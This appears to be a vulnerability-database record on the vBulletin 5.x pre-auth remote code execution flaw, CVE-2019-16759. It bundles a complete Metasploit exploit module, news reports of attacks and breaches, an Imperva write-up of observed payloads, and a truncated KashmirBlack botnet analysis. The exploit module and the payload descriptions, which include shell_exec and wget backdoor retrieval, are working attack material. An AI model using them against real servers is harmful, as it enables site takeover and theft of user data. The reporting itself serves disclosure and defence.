{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-17496", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:41:02", "description": "\nvBulletin 5.x - Remote Command Execution (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-30T00:00:00", "title": "vBulletin 5.x - Remote Command Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-30T00:00:00", "id": "EXPLOITPACK:195EC6198873D3265FF46CC0358D10F2", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\n 'Description' => %q{\n vBulletin 5.x 0day pre-auth RCE exploit.\n This should work on all versions from 5.0.0 till 5.5.4\n },\n 'Platform' => 'php',\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Reported by: anonymous', # reported by\n 'Original exploit by: anonymous', # original exploit\n 'Metasploit mod by: r00tpgp', # metasploit module\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x22\",\n },\n 'References' =>\n [\n ['CVE', 'CVE-2019-16759'],\n ['EDB', 'NA'],\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\n ],\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n [ 'Automatic Targeting', { 'auto' => true } ],\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\n ],\n 'DisclosureDate' => 'Sep 23 2019',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\n ])\n\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\n 'encode_params' => false,\n 'vars_post' => \n {\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\n }\n })\n\n if res && res.body && res.body.include?('h4x0000r4l1f4')\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending payload.....\")\n resp = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\n 'encode_params' => false,\n 'vars_post' =>\n {\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\n\t 'widgetConfig[code]' => payload.encoded,\n }\n })\n #unless resp and resp.code == 200\n # fail_with(Failure::Unknown, \"Exploit failed.\")\n #end\n\n #print_good(\"Success!\")\n #print_line(resp.body)\n\n end\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-09-09T22:43:51", "description": "A critical remote code execution (RCE) bug affecting default 5.x versions of vBulletin (CVE-2019-16759) is being actively exploited in the wild, allowing unauthenticated attackers to take control of web hosts.\n\nA zero-day proof-of-concept code was [anonymously published](<https://seclists.org/fulldisclosure/2019/Sep/31>) on Monday, ahead of vBulletin issuing a patch. Also, Tenable vice president of intelligence Gavin Millard said via email that there is now a script to [leverage Shodan](<https://github.com/Frint0/mass-pwn-vbulletin>) and mass identify thousands of vulnerable systems.\n\n## Bug Details\n\nA successful exploit would allow an attacker to take control of a site using vBulletin, a popular platform for powering online forums and communities.\n\nAccording to Sucuri researcher Marc-Alexandre Montpas, the bug is caused by a flaw in vBulletin\u2019s PHP widgets, which are rendered at runtime and used to create dynamic widgets without having to directly access the hosting server.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe researcher found a way to force the site to render arbitrary widgets using the ajax/render/widget_php route,\u201d he explained in [a blog post](<https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html>) this week. \u201cSince the evalCode callback does exactly what you think it does, essentially running eval on the code it is fed, this makes it possible to run arbitrary code on the underlying server.\u201d\n\nTenable Research [analysis showed](<https://www.tenable.com/blog/critical-zero-day-pre-authentication-remote-code-execution-exploit-published-for-5-x-versions>) that an unauthenticated attacker can exploit the issue by sending a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands.\n\n\u201cThese commands would be executed with the permissions of the user account that the vBulletin service is utilizing,\u201d said Tenable researcher Ryan Seguin, in the analysis. \u201cDepending on the service user\u2019s permissions, this could allow complete control of a host\u2026.the published exploit code returns its successful execution in a JSON formatted response.\u201d\n\nThe fix is for versions 5.5.2, 5.5.3 and 5.5.4; users on earlier versions of vBulletin 5.x will need to update to one of the currently supported versions in order to apply the patch. The fix has also been applied to the cloud version of the platform.\n\nAdministrators should apply the patch as soon as possible.\n\nMontpas warned, \u201cThis vulnerability is extremely severe. It allows any website visitors to run PHP code and shell commands on the site\u2019s underlying server. As if it wasn\u2019t bad enough, this bug doesn\u2019t require the attacker to have any kind of privilege to conduct a successful attack. vBulletin\u2019s default settings also make the vulnerable endpoint accessible by default.\u201d\n\n## Attacks in the Wild\n\nSucuri and Tenable telemetry has identified a rash of attacks already taking place in the wild, just days after the PoC was dropped on Securelist.\n\n\u201cThe payload attackers are using is very interesting: It essentially modifies the vulnerable snippet by adding a password validation,\u201d Montpas noted. \u201cThis is a way for attackers to maintain access to sites they\u2019ve hacked for themselves, as well as lock out other potential hackers from getting in. From this point, the bad actor can use his newly acquired site to do other malicious things in the future.\u201d\n\nTo find out if a site has been compromised, the researcher said to look for \u201cajax/render/widget_php\u201d in the access logs. That\u2019s because some of the parameters used in the attacks can be located on POST requests, which wouldn\u2019t leave any traces in the logs.\n\nMike Bittner, associate director of Digital Security and Operations at The Media Trust, said that it was just a matter of time before bad actors fixed their crosshairs on forums, which are rich storehouses of user information.\n\n\u201cThe argument that many of today\u2019s sites do not collect users\u2019 information betrays a very uninformed notion of how websites work,\u201d he said via email. \u201cMost, if not all, of today\u2019s websites are built using a vendor\u2019s platform. If you\u2019re a small business, you probably don\u2019t have the time or the money to build your own platform. If you\u2019re a medium-sized or large organization, you don\u2019t have the time or money to build a platform with all the bells and whistles users have come to expect. Forums are just one example. Unfortunately, vendors that supply these features too often collect information on users without site owners\u2019 authorization, while failing to equip their products with the needed security and privacy protections, leaving website owners to fend for themselves and shoulder the blame for any data breaches involving their sites. In an environment where bad actors are always looking out for vulnerabilities they can exploit or well-intentioned products like vBulletin they can abuse, site owners will need to close the security gaps themselves\u2013ideally by carefully vetting their vendors and ensuring those vendors observe digital policies.\u201d\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-09-26T17:45:03", "type": "threatpost", "title": "Rash of Exploits Targets Critical vBulletin RCE Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T17:45:03", "id": "THREATPOST:93DDA46851A2B52DAA3C46486A4B35F7", "href": "https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-10T12:10:37", "description": "Hackers have stolen the account details of 250,000 users of Dutch sex-work forum Hookers.nl \u2013 including email addresses of both escorts and customers.\n\nThe website provides a forum for escorts and customers to discuss sex work \u2014 including clients discussing their experiences with sex workers. A moderator on the forum said [on Thursday](<https://www.hookers.nl/forum/hookers-hang-out/over-ons/bugs-andere-foutjes/2811760-datalek-hookers-nl>) that a hacker gained access to personal details through a recently disclosed software vulnerability in an external software supplier of the website, vBulletin, which powers the forum.\n\nThe hacker was able to exploit the flaw to access a Hookers.nl user database, which includes the email addresses, usernames, hashed passwords and IP addresses of forum users. In some cases, email addresses and usernames could include users\u2019 full names.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cA data breach has occurred and the email addresses have been stolen from all users,\u201d said the forum moderator. \u201cPlease note the passwords. These email addresses have been offered for sale online by hackers. Offering this information for sale is punishable by law and if possible we will take legal action against this or that. In addition, a report has been made to the Dutch Data Protection Authority.\u201d\n\nA [news outlet](<https://nos.nl/artikel/2305470-e-mailadressen-bezoekers-prostitutieforum-uitgelekt-en-te-koop-aangeboden.html>), Dutch Broadcast Foundation, who was in contact with the hacker, viewed the database and confirmed its legitimacy. The outlet reported that the hacker is selling the database for just $300. According to the news outlet, the hacker has not yet sold the data \u2013 but expects it will sell.\n\nThe [vBulletin vulnerability](<https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/>) in question ([CVE-2019-16759](<https://www.cvedetails.com/cve/CVE-2019-16759/>)), which allows remote command-execution, was disclosed last week. Though vBulletin has released patches for the flaw, exploit code was released on Sept. 23 \u2013 and many websites have not yet updated.\n\nThat has been seen through the active exploit of several websites, including a data breach impacting Comodo (as recently announced last week on [Comodo\u2019s forum](<https://forums.comodo.com/general-announcements/important-security-notice-about-comodo-forums-accounts-t124921.0.html>)).\n\nThe sensitive nature of the content on Hookers.nl could make the data ripe for the blackmail of affected users \u2013 both for clients and for the prostitutes actively using the forum, Chris Morales, head of security analytics at Vectra, told Threatpost.\n\n\u201cvBulletin is used for internet forums of every interest, from cooking, cars and to computers,\u201d he said. \u201cNormally an account used on a bulletin board does not contain a huge amount of information on the user, or at least it shouldn\u2019t. I wouldn\u2019t consider a public forum software compromise to be a high-risk issue. I think the nature of this bulletin board, a focus on sex workers, does change that sensitivity. That is quite exposing considering the conversations and that it reveals who the sex workers are.\u201d\n\nThe incident is reminiscent of a [2015 breach of Ashley Madison](<https://threatpost.com/password-cracking-crew-cracks-11m-ashley-madison-passwords/114625/>), an adultery hook-up website that resulted in hackers making away with names, emails, home addresses, credit card data and sexual fantasy information of all of its customers.\n\n\u201cAction has been taken as quickly as possible,\u201d according to the forum moderator. \u201cvBulletin has released a software patch that we have implemented after testing to address the leak.\u201d\n\n**_What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-10T20:37:40", "type": "threatpost", "title": "vBulletin Flaw Exploited in Dutch Sex-Work Forum Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-10-10T20:37:40", "id": "THREATPOST:4A277DEB5D5A3A6B9256417086928D71", "href": "https://threatpost.com/vbulletin-flaw-dutch-sex-work-forum-breach/149100/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-16T22:18:50", "description": "A security researcher has published proof-of-concept code to outsmart a patch issued last year for a zero-day vulnerability discovered in vBulletin, a popular software for building online community forums.\n\nCalling a patch for the flaw a \u201cfail\u201d and \u201cinadequate in blocking exploitation,\u201d Austin-based security researcher Amir Etemadieh published details and examples of exploit code on three developer platforms\u2013 Bash, Python and Ruby\u2013for the patch in a post published [Sunday night](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>).\n\nOn September 23, 2019, an unidentified security researcher released [exploit code](<https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/>) for a flaw that allowed for PHP remote code execution in vBulletin 5.0 through 5.4, Etemadieh wrote.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\nClick to register!\n\nThe zero-day, [CVE-2019-16759](<https://www.cvedetails.com/cve/CVE-2019-16759/>), is called a pre-auth RCE bug, which can allow an attacker to run malicious code and take over forums without needing to authenticate on the sites that are under attack.\n\n\u201cThis bug (CVE-2019-16759) was labeled as a \u2018bugdoor\u2019 because of its simplicity by a [popular vulnerability broker](<https://twitter.com/cbekrar/status/1176803541047861249?>) and was marked with a [CVSS 3.x score of 9.8](<https://nvd.nist.gov/vuln/detail/CVE-2019-16759>) giving it a critical rating,\u201d he said in the post.\n\nA patch was issued two days later, Sept. 25, 2019, that \u201cseemed, at the time, to fix the proof of concept exploit provided by the un-named finder,\u201d Etemadieh said.\n\nIt appears that it didn\u2019t however, as Etemadieh outlined how it can be bypassed on the three developer platforms in three separate proof-of-concepts.\n\nThe key problem with the patch issued for the zero day is related to how the vBulletin template system is structured and how it uses PHP, he wrote in the post.\n\n\u201cTemplates aren\u2019t actually written in PHP but instead are written in a language that is first processed by the template engine and then is output as a string of PHP code that is later ran through an eval() during the \u2018rendering\u2019 process,\u201d according to the post. \u201cTemplates are also not a standalone item but can be nested within other templates, in that one template can have a number of child templates embedded within.\u201d\n\nThe patch is \u201cshort-sighted\u201d because it faces problems when encountering a user-controlled child template, Etemadieh wrote. In this case, a parent template will be checked to verify that the routestring does not end with a widget_php route, Etemadieh said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/11080636/vbulletin-site.png>)\u201cHowever we are still prevented from providing a payload within the widgetConfig value because of code within the rendering process, which cleans the widgetConfig value prior to the templates execution,\u201d he wrote in his post.\n\nEtemadieh goes on to show how another template that appears in the patch is \u201ca perfect assistant in bypassing the previous CVE-2019-16759 patch\u201d thanks to two key features: the template\u2019s ability to load a user-controlled child template, and how it loads the child template by taking a value from a separately named value and placing it into a variable named \u201cwidgetConfig.\u201d\n\n\u201cThese two characteristics of the \u2018widget_tabbedcontainer_tab_panel\u2019 template allow us to effectively bypass all filtering previously done to prevent CVE-2019-16759 from being exploited,\u201d he wrote.\n\nIt\u2019s unclear if Etemadieh informed vBulletin before posting the workarounds; however, a [report](<https://www.zdnet.com/article/security-researcher-publishes-details-and-exploit-code-for-a-vbulletin-zero-day/>) in ZDNet suggests that he did not. No matter, he did provide a quick fix for his bypass of the patch in his post, showing how to disable PHP widgets within vBulletin forums that \u201cmay break some functionality but will keep you safe from attacks until a patch is released by vBulletin,\u201d he wrote.\n\nTo apply the fix, administrators should:\n\n 1. Go to the vBulletin administrator control panel.\n 2. Click \u201cSettings\u201d in the menu on the left, then \u201cOptions\u201d in the dropdown.\n 3. Choose \u201cGeneral Settings\u201d and then click \u201cEdit Settings\u201d\n 4. Look for \u201cDisable PHP, Static HTML, and Ad Module rendering\u201d, Set to \u201cYes\u201d\n 5. Click \u201cSave\u201d\n\nOnline forums are a popular target for hackers because of they typically have a wide and diverse user base and store a large amount of personally identifiable information about those users.\n\nIndeed, hackers wasted no time in using Etemadieh\u2019s bypass to try to hack into the forum at the DEF CON security conference, according to a [post on Twitter](<https://twitter.com/thedarktangent/status/1292813958332596224>) by DEFCON and Black Hat founder [Jeff Moss](<DEF%20CON%20and%20Black%20Hat>). However, administrators quickly applied Etemadieh\u2019s advice to disable PHP to thwart the attack, he tweeted.\n\n\u201cDisable PHP rendering to protect yourself until patched!\u201d Moss advised.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-11T12:09:30", "type": "threatpost", "title": "Researcher Publishes Patch Bypass for vBulletin 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16759", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-11T12:09:30", "id": "THREATPOST:01643D93E5C8B6F18CEF9BF8FA7BFF89", "href": "https://threatpost.com/researcher-publishes-bypass-for-patch-for-vbulletin-0-day-flaw/158232/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2019-09-26T15:44:30", "description": "Imperva\u2019s Cloud WAF has identified instances of a new 0-day vulnerability being exploited within a matter of hours of the exploit being published.\n\nOn Monday 23rd September 2019, an exploit was published for a vulnerability found within vBulletin (versions 5.0.0 to 5.5.4), allowing malicious attackers to perform authentication-free Remote Code Execution on the origin server. Alongside the exploit, \u201cgoogle dorks\u201d - which allow attackers to find potentially vulnerable instances of the service in the wild - were also published.\n\nThe vulnerability exists where URL parameters are passed to a widget file within the forum software itself. These parameters are then parsed on the server without any security checks - the malicious attacker can then inject commands and is able to remotely execute code on the application server.\n\nThe exploit for this vulnerability enables an attacker to generate a post request to the vulnerable instance of vBulletin, containing the parameter \u2018widgetConfig\u2019 which is parsed on the server and evaluated without being sanitized. For example: \n \nThe attack pattern triggered mitigation rules on our Cloud WAF, based on known existing attack patterns as well as on data we\u2019ve collected on malicious source IPs. This allowed Imperva to observe and block the attack as it occurred, within 24 hours of the vulnerability\u2019s publication. The rules in question matched against known malicious Remote Code Execution patterns present in the body of the request.\n\nA Python-based exploit, which can easily be used by low skilled attackers is now publicly available for anyone to exploit this 0-day vulnerability, which has been assigned[ CVE-2019-16759.](<https://nvd.nist.gov/vuln/detail/CVE-2019-16759>)\n\nBelow are some examples of the payloads observed since the exploit's release, along with a brief explanation of the perceived attacker intent.\n\n## Example 1:\n\n**Number of similar observed requests: **7,000+ \n**Explanation: **The attacker is using the shell_exec function to execute shell commands on the server.\n\n## Example 2:\n\n**Number of similar observed requests: **3,000+ \n**Explanation: **The attacker is likely testing the exploit by executing the md5 function on a given string. If the server returns the md5 hash the exploit has worked.\n\n## Example 3:\n\n**Number of similar observed requests: **70+ \n**Explanation: **The eval function is used to run base64 decoded, obfuscated php.\n\n## Example 4:\n\n**Number of similar observed requests: **50+ \n**Explanation: **Attempts to read a remote file, demonstrating that the server can execute an attacker code.\n\n## Example 5:\n\n**Number of similar observed requests: **1 \n**Explanation:** The attacker is using the shell_exec to use wget to retrieve a php file from a remote location, and write it to the server. In this instance the php code is a backdoor, enabling uploads of additional files.\n\n## vBulletin RCE Vulnerability: Timeline of Events\n\nAt the time of writing, Imperva has observed over 10,000 instances of rules triggered by the payload generated by the published exploit.\n\n 1. **23/09/19 - 23:05:** vBulletin 5.x 0day pre-auth RCE exploit published on seclists.org.\n 2. **24/09/19 - 08:15:** First malicious requests similar to the payload from the published exploit triggers blocking rules on Imperva Cloud WAF. \n__These initial payloads were not generated directly from the published exploit, however, as \u2018echo shell_exec('\"+cmd+\"');\u2019 is passed in the parameter in the published exploit so shell commands can be executed.\n 3. **25/09/19 - 03:02:** First malicious payloads matching exactly those generated by the published exploit trigger blocking rules on Imperva Cloud WAF._ \n \n_\n 4. **25/09/19 - 05:15:** Mass-Pwn-vBulletin scanner published on Github\n 5. **25/09/19 - 10:17:** vBulletin security patch released on forums.\n 6. **25/09/19 - 13:38:** First malicious requests matching those generated by the Mass-Pwn-vBulletin scanner observed and blocked.\n 7. **25/09/19 - 14:58: Specific rule matching the published exploit added globally to Imperva Cloud WAF.**\n 8. **26/09/19 - 04:50:** Nmap script for CVE-2019-16759 released on Github.\n\nAnother valuable insight provided by the functionality in the Imperva Cloud WAF was the ability to track the volume of malicious requests from IPs of known threat actors, which is constantly updated. The Imperva Cloud WAF has unique ways of gathering this data and, in this case, we were able to observe that a number of the requests originated from IPs which had already been listed as malicious in previous activities such as remote file inclusion. \n\nThe Security Research Team at Imperva are continuing to monitor this attack as it develops.\n\nThe post [Attackers Are Quick to Exploit vBulletin\u2019s Latest 0-day Remote Code Execution Vulnerability](<https://www.imperva.com/blog/attackers-are-quick-to-exploit-vbulletins-latest-0-day-remote-code-execution-vulnerability/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-26T13:43:30", "type": "impervablog", "title": "Attackers Are Quick to Exploit vBulletin\u2019s Latest 0-day Remote Code Execution Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T13:43:30", "id": "IMPERVABLOG:E0E8BEBCCF52907348567BCF57CCF0A8", "href": "https://www.imperva.com/blog/attackers-are-quick-to-exploit-vbulletins-latest-0-day-remote-code-execution-vulnerability/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-23T00:02:03", "description": "## Introduction\n\nThe previous blog - \u201c[CrimeOps of the KasmirBlack Botnet - Part I](<https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-i/>)\u201d - described the DevOps behind the botnet. It showed how its well-designed infrastructure makes it easy to expand and add new exploits or payloads without much effort,and explained the evolution and version deployment of the botnet.\n\nThe blog mentioned the delivery process of the botnet\u2019s exploits and payloads, the steps made to secure the C&C, and the infrastructure changes taken to make the botnet more dynamic and scalable, while achieving redundancy, failover and load balancing.\n\nThree questions were raised: What? When? And How? - although only the first two were answered. \n\nThis blog will uncover the bits-and-bytes behind the third question: How? \nWe will explain how the KashmirBlack botnet operates, describe its entities, and dive into the spreading technique.\n\nThe botnet infrastructure is composed of nine types of entities, each of which plays a specific role in the complex botnet operation. All share the same goal, however; to expand the botnet by delivering KashmirBlack malicious script to victim servers, to carry out its crimes.\n\nWe\u2019ll take a walk into the darker side of the KashmirBlack botnet, and explore the techniques used by the malicious script to stay under the radar, communicate with the C&C, send instructions to other bots in the botnet and track the entire operation. Breaking down the botnet spreading technique, we\u2019ll show the different vulnerabilities the botnet\u2019s malicious script exploits and discuss the different types of payload outcomes.\n\nIn the \u201cSummary\u201d section you can find indicators of compromise (IOC), remediation, and the impact on Imperva customers.\n\n### The Botnet Entities\n\nLet\u2019s take a glimpse into the heart of the botnet and all the pieces that make up this complex infrastructure.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-1-KashmirBlack-botnet-flow-diagram-.png>)\n\nFigure 1: KashmirBlack botnet flow diagram\n\n**The C&C** \nThe C&C server is a centralized machine able to send commands and receive telemetries from machines that are part of a botnet. \nThe KashmirBlack C&C, located in Indonesia, has three main roles:\n\n* Supply a Perl script that infects the victim server with the botnet malicious script\n* Receive reports of findings and attack results from bots\n* Supply bots with attack instructions\n\nFigure 2 below shows the login page of the C&C:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-2-CC-login-page-.png>)\n\nFigure 2: C&C login page\n\nWhen checking the **\u2018C&C\u2019** URL in VirusTotal it appears to be a malicious site detected by only one vendor. \n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-3-Virustotal-check-for-the-CC-URL-.png>)\n\nFigure 3: Virustotal check for the C&C URL\n\nWe suspect the server is owned by the attacker since, unlike most sites, there is no main page under the domain name.\n\n**Repository A** \nThe original **\u2018repository A\u2019** is a printer component shopping site that was hacked by the attacker and is now used as a repository to store files. \nThis entity plays a role in the infection by supplying the botnet malicious script - to communicate with the C&C. \nAfter the May 2020 infrastructure change, **\u2018repository A\u2019** was extended to seven repositories.\n\nWhen checking the **\u2018repository A\u2019** URL in VirusTotal it appears to be a legitimate site.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-4-\u2018repository-A-shopping-site.png>)\n\nFigure 4: **'repository A'** shopping site\n\nThe files are hidden inside the css path (hxxps://<site\u2019s domain>>/css) among other css files used by the innocent web server. The malicious files are zip files camouflaged with a .css extension. All the files uploaded to the repository by the attacker are password-protected to ensure their content can\u2019t be revealed should someone find them.\n\n**Repository A Load Balancer** \nAs the botnet size increased, so too did the load on the repositories, as more bots fetched files from these repositories.\n\nThe addition of a new entity, \u2018repository A load balancer\u2019, allowed scalability. A request to the load balancer returned the address of one of the multiple repositories in \u2018repository A\u2019. To integrate this change into the botnet operation, an additional change in the botnet malicious script was required.\n\n**Repository B** \nThe original **\u2018repository B\u2019** is another allegedly legitimate site, according to VirusTotal. The site is classified as an educational institution and is used by the hacker to store bundles of exploits and payloads.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-5-\u2018repository-B-educational-institution-site-.png>)\n\nFigure 5: **'repository B'** educational institution site\n\nSimilar to \u2018repository A\u2019, the attacker uses a .css extension to hide traces under the /css directory. \nFigure 6 below shows the content of **\u2018repository B\u2019** of exploit and payload files with the prefix of inmemory. \nThe first file was uploaded on November 6, 2019; the earliest evidence we\u2019ve found for the KashmirBlack botnet operation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-6-\u2018_css-directory-content-of-\u2018repository-B-.png>)\n\nFigure 6: \u2018/css' directory content of **\u2018repository B'**\n\nAs part of the infrastructure change, \u2018repository B\u2019 was extended to 74 repositories. \n\n**KashmirBlack GitHub Repository**\n\nThe GitHub repository participated in the attack phase by allowing the attacker to download PHP webshells. \nThe attacker used GitHub as a version control to store his files, among which were crypto miners and multiple webshells used to control, upload, or dump the entire database of a victim server.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-7-The-attacker-repository-.png>)\n\nFigure 7: The attacker repository\n\nWe tracked the attacker\u2019s activity over time, and the malicious files maintained under the repository. \nThe account was opened in July 2017. There was activity from November 2019, the time the botnet started its operation, with further subsequent activity including the XMRig miner that was uploaded in March 2020. \nThe account was deleted in May 2020, probably as a reaction to the discovery of our honeypot by the hacker behind KashmirBlack.\n\n**Pastebin** \nPastebin is a website that allows anonymous users to share plain text through public posts called \u2018pastes\u2019. \nThe Pastebin entity in the operation was used as a quick and easy means of accessing download backdoors throughout the infection.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-8-webshell-used-by-the-attacker-stored-in-pastebin-.png>)\n\nFigure 8: Webshell used by the attacker stored in pastebin\n\n**Bot** \nA bot is considered as a server over which the attacker has control. \nIn the KashmirBlack botnet there are two types of bots:\n\n* Spreading bot\n* Pending bot\n\nSpreading Bot: \nA \u2018spreading bot\u2019 constantly communicates with the C&C to receive attack instructions, and is used for infecting new machines, thus expanding the botnet. \n \nPending Bot: \nA \u2018pending bot\u2019 is a victim site that is attacked by a \u2018spreading bot\u2019 and, as a result, is under the control of the C&C. Once a victim site turns into a \u2018pending bot\u2019, it stays in idle mode until the C&C approaches and changes its purpose. \nA 'pending bot\u2019, unlike a \u2018spreading bot\u2019, does not initiate communication with the C&C. \n\nThis repurposing can result in several outcomes - spreading bot, spam, cryptomining, or becoming a repository entity in the infrastructure.\n\nFigure 9 shows the actions (exploit or 